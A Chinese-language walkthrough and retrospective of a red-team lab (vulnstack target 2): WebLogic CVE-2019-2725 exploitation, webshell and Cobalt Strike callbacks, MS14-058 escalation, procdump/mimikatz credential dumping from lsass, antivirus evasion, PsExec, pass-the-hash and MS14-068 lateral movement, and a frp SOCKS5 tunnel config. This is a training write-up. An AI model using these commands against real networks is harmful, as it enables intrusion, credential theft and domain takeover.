红日靶场（二）ATT&CK红队评估第一次打+复盘总结

下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
环境配置：

web靶机需要恢复到快照3，然后登陆时切换用户为:WEB\de1ay 密码:1qaz@WSX，这样后续还有提权步骤，进入目录C:\Oracle\Middleware\user_projects\domains\base_domain，运行startweblogic服务
然后我将虚拟机nat网段设置成了和web靶机一样的192.168.111.0/24，然后让web靶机改为自动获取ip，就可以出网了
配置信息：

1. DC
2. IP：10.10.10.10 OS：Windows 2012(64)
3. 应用：AD域
4. WEB
5. IP1：10.10.10.80 IP2：192.168.111.4 OS：Windows 2008(64)
6. 应用：Weblogic 10.3.6MSSQL 2008
7. PC
8. IP1：10.10.10.201 IP2：192.168.111.5 OS：Windows 7(32)

复制代码

1.web外网打点

直接pingweb主机发现ping不同，可能是防火墙的问题，nmap用SYN做全端口扫描nmap -sS -Pn -p1-65535 192.168.111.4 Pn为不发送icmp包

逐一尝试每个端口，最后在7001端口发现有内容，扫描一下路径

看一下login这个路径，发现是WebLogic Server 版本: 10.3.6.0

直接搜索一下该版本漏洞，发现存在CVE-2019-2725，本来想直接msf用这个CVE去打，但是发现有360

然后在网上找了个可以利用这个CVE的工具，下载地址:https://github.com/shack2/javaserializetools

然后上传了个冰蝎自带的jsp木马

然后冰蝎成功上线

然后CS设置好监听后直接弹给CS，但是360又给干碎了

这里试了很久，要么就是被360拦截，要么就是无法联动，tnnd，直接物理黑客把360关了(主要是我的虚拟机出忘了，360自动更新了，太菜了shellcode免杀技术不过关)
然后派生给cs，cs成功上线

提权直接使用MS14-058提权，我通过msf直接提不成功，用的以下工具：https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058

发现可以提权后，用cs生成一段powershell上线脚本，然后运行Win64.exe "powershell脚本内容"，这样就可以上线cs啦


上线后再派生到msf方便结合进行内网信息收集，这里也可以再多进行下权限维护

2.内网信息收集

CS获取凭据信息

msf查看下域控、域成员等

msf自动建立并查看路由

利用web靶机作为跳板，用msf对内网实时扫描探测，发现了内网主机ip（前面已经知道了10.10.10.10是域控，接下来对域控进行探测）

使用nmap挂上代理对其进行扫描（有点慢）

或者直接使用cs来扫描也是一样的portscan 10.10.10.0/24，内网存活主机探测加端口扫描

扫描结果就是都开启了445和3389
3.域横向

先用永恒之蓝试试域控呢过不能拿下，msf扫描一下看是否存在漏洞，结果显示存在

但是问题是一直没有会话返回，没办法换条路走，用psexec.exe来实现域横向，这里因为是win server 2008的缘故，正好是可以直接抓到明文密码的，直接拿抓到的明文密码试一试（后面都没图了，忘了截）
上传psexec.exe到web靶机，然后因为DC靶机开启了139,445端口，尝试在web靶机上IPC$连一下DC，发现可以连接成功
这时使用psexec获取到DC的system权限就好了
PsExec.exe -accepteula \\DC -s cmd.exe
接下来就需要让DC上线CS，方便后续操作，通过web靶机在cs设置一个中转监听，然后生成该监听器的payload
将payload上传到web靶机，在通过IPC$共享复制到DC靶机上
system权限运行，CS成功上线DC域控靶机，然后我可以用打域控同样的方式拿下PC靶机
3.其他方式的内网渗透

因为上面的内网渗透方式是直接打的，有许多不足，后面复盘的时候有尝试勒几种不同的方式，不过因为没截图，所以接来下就都用文字说明了~
杀软的问题

上面我是直接手动把杀软关了，后面发现除了做免杀还是有办法的（主要做了好久发现还是过不了360，太菜了）
获取webshell后上传MS14-058.exe的提权工具（我做了简单的免杀后这个没有被360杀掉，msf的shellcode是怎么都被杀），然后上传procdump.exe，用该提权工具以system权限运行procdump.exe -accepteula -ma lsass.exe lsass.dmp导出lsass信息，然后下载到本地，用mimikatz离线获取到管理员明文密码（其实这么简单的密码NTLM Hash爆破也出来了）
有了明文密码之后，因为第一次扫描就发现开了3389，直接3389登录管理员身份远程桌面，手动关掉杀软就行，PC靶机也可使用此方式，不过要先搭建socks代理用web靶机将流量转发出来才可以连接到PC的RDP
ps：这里我后续还测试了msf的killav以及强制taskkill /PID /F等，都是关不掉的，只能手动点击关闭，或者师傅们有别的办法可以传授我~
域横向的其他方法

之前我是直接用psexec.exe通过明文密码的方式横向移动的，但是psexec这个工具并不好，会产生大量日志
这里我们用wmic.py工具先进行PTH攻击，然后用ipc$的方式连接域控，上传shellcode（因为域控没有杀软），或者是
或者我们可以用PTT的方式，利用ms14-068漏洞，执行下面命令获得可以访问域控的票据，再把票据注入内存
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
ps：这里顺便想说一下我在域内比如要用impacket包里的python脚本工具怎么办，比如wmic.py，因为想web靶机没有Python环境，只能将流量代理出来，cs的socks4a速度慢得很，msf的socks代理我感觉总是有有问题，所以还是自己上传frp或ew这种手动建立socks5要快一些
我一般使用frp，frp建立socks5代理只需要修改frpc.ini即可（新get到的，之前都是用ew）
frpc.ini配置：

1. [common]
2. server_addr = 服务器IP
3. server_port = 7778
4. [sock5]
5. type = tcp
6. remote_port =8111
7. plugin = socks5

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！